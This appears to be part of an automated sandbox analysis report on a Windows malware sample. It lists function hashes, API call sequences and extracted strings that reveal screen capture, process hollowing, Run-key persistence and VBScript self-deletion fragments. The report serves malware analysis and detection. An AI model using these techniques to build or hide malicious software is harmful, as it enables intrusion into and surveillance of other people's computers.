                                          • Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
                                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                          • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                          • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                          • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                          • Opcode Fuzzy Hash: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                          • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                          • Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
                                          • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                          • Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                          • Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
                                          • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                          • Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                          • Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
                                          • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                          • Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                          • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                          • Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                          • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
                                          APIs
                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                            • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                          • DeleteDC.GDI32(00000000), ref: 00418F68
                                          • DeleteObject.GDI32(00000000), ref: 00418F6B
                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                          • DeleteDC.GDI32(00000000), ref: 00418F9D
                                          • DeleteDC.GDI32(00000000), ref: 00418FA0
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                          • GetCursorInfo.USER32(?), ref: 00418FE2
                                          • GetIconInfo.USER32(?,?), ref: 00418FF8
                                          • DeleteObject.GDI32(?), ref: 00419027
                                          • DeleteObject.GDI32(?), ref: 00419034
                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00660046), ref: 00419077
                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                          • DeleteDC.GDI32(?), ref: 004191B7
                                          • DeleteDC.GDI32(00000000), ref: 004191BA
                                          • DeleteObject.GDI32(00000000), ref: 004191BD
                                          • GlobalFree.KERNEL32(?), ref: 004191C8
                                          • DeleteObject.GDI32(00000000), ref: 0041927C
                                          • GlobalFree.KERNEL32(?), ref: 00419283
                                          • DeleteDC.GDI32(?), ref: 00419293
                                          • DeleteDC.GDI32(00000000), ref: 0041929E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                          • String ID: DISPLAY
                                          • API String ID: 4256916514-865373369
                                          • Opcode ID: c1f87ec315365c2bd807a29870f8556d4033a7f08f871e569c42423f77b65dc4
                                          • Instruction ID: 987d9a4534759b20ade43e5cc0d007ec6aae9fd5378911baa39845865ae00971
                                          • Opcode Fuzzy Hash: c1f87ec315365c2bd807a29870f8556d4033a7f08f871e569c42423f77b65dc4
                                          • Instruction Fuzzy Hash: D8C15C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                          APIs
                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,004752E8,00475300,?,pth_unenc), ref: 0040B8F6
                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                          • ExitProcess.KERNEL32 ref: 0040D80B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$tMG$wend$while fso.FileExists("$xdF$xpF
                                          • API String ID: 1861856835-1567776996
                                          • Opcode ID: 378485639873f91e3566d37bd4c9dc270e24a7b07407a649f66661562ec7a51b
                                          • Instruction ID: 74aa42f7ec26bf67edaf4e1a165d404297a62af2c65c2789fcbb2c22ca84ca6d
                                          • Opcode Fuzzy Hash: 378485639873f91e3566d37bd4c9dc270e24a7b07407a649f66661562ec7a51b
                                          • Instruction Fuzzy Hash: B991B1316082005AC315FB62D8529AFB3A8AF94309F50443FB64AA71E3EF7C9D49C65E
                                          APIs
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                          • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                          • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                          • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                          • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                          • ResumeThread.KERNEL32(?), ref: 00418470
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                          • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                          • GetLastError.KERNEL32 ref: 004184B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                          • API String ID: 4188446516-3035715614
                                          • Opcode ID: 8f07b7a254e48d041da81a251375b09bf463a0f5c88c0795319c3241d295ec1a
                                          • Instruction ID: 6e605283caf6159cf0966bfa06415cd8be065dbd330dc5e1b11c181c8b11ae87
                                          • Opcode Fuzzy Hash: 8f07b7a254e48d041da81a251375b09bf463a0f5c88c0795319c3241d295ec1a
                                          • Instruction Fuzzy Hash: 5AA14DB0604301AFDB209F64DD85B6B7BE8FB88745F04482EF689D6291EB78DC44CB59
                                          APIs
                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D1E0
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D223
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D232
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,004752E8,00475300,?,pth_unenc), ref: 0040B8F6
                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                          • ExitProcess.KERNEL32 ref: 0040D454
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: ")$.vbs$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$tMG$wend$while fso.FileExists("$xdF$xpF
                                          • API String ID: 3797177996-4161133245
                                          • Opcode ID: ef64bbdb6b6bc413f4a38ff03c8248d9edabe3d8d9292ccc6fe4a1ee121b6e30
                                          • Instruction ID: d04a29aa4e51556796b06844e147f4a7cb6a24a543372ca0e3e4f3e54a9e1c14
                                          • Opcode Fuzzy Hash: ef64bbdb6b6bc413f4a38ff03c8248d9edabe3d8d9292ccc6fe4a1ee121b6e30
                                          • Instruction Fuzzy Hash: 7781A1716082405BC715FB62D8529AF73A8AF94308F10443FB58A671E3EF7C9E49C69E
                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750F4,00000003), ref: 004124CF
                                          • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                          • CloseHandle.KERNEL32(00000000), ref: 00412576
                                          • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                          • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                          • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                          • Sleep.KERNEL32(000001F4), ref: 004126BD
                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                          • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                          • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                          • String ID: (TG$.exe$HSG$WDH$exepath$open$temp_
                                          • API String ID: 2649220323-4116078715
                                          • Opcode ID: 1946e344db4618885ae756797aea411b1648c6a2fe0413653f6271bec6169604
                                          • Instruction ID: 24c9a3d3f9f851b6826daa3a71410153ee30a0e468f06c14c2e22e8a151f545e
                                          • Opcode Fuzzy Hash: 1946e344db4618885ae756797aea411b1648c6a2fe0413653f6271bec6169604
                                          • Instruction Fuzzy Hash: B551C771A00315BBDB10ABA09C99EFE336D9B04755F10416BF901E72D2EFBC8E85865D
                                          APIs
                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EF0,00000000), ref: 0041B21F
                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                          • SetEvent.KERNEL32 ref: 0041B2AA
                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                          • CloseHandle.KERNEL32 ref: 0041B2CB
                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                          • API String ID: 738084811-1354618412
                                          • Opcode ID: 8d58fbfb6190c3f3b09755e9cec4986d803daceaa2324f9e2d03a17bc5feb97a
                                          • Instruction ID: 3073296416e4f75d74a960dba2816641598052066ba22d453d93bca4cbe87184
                                          • Opcode Fuzzy Hash: 8d58fbfb6190c3f3b09755e9cec4986d803daceaa2324f9e2d03a17bc5feb97a
                                          • Instruction Fuzzy Hash: 4E51A5B12442056ED714B731DC96EBF379CDB80359F10053FB24A621E2EF789D4986AE
                                          APIs
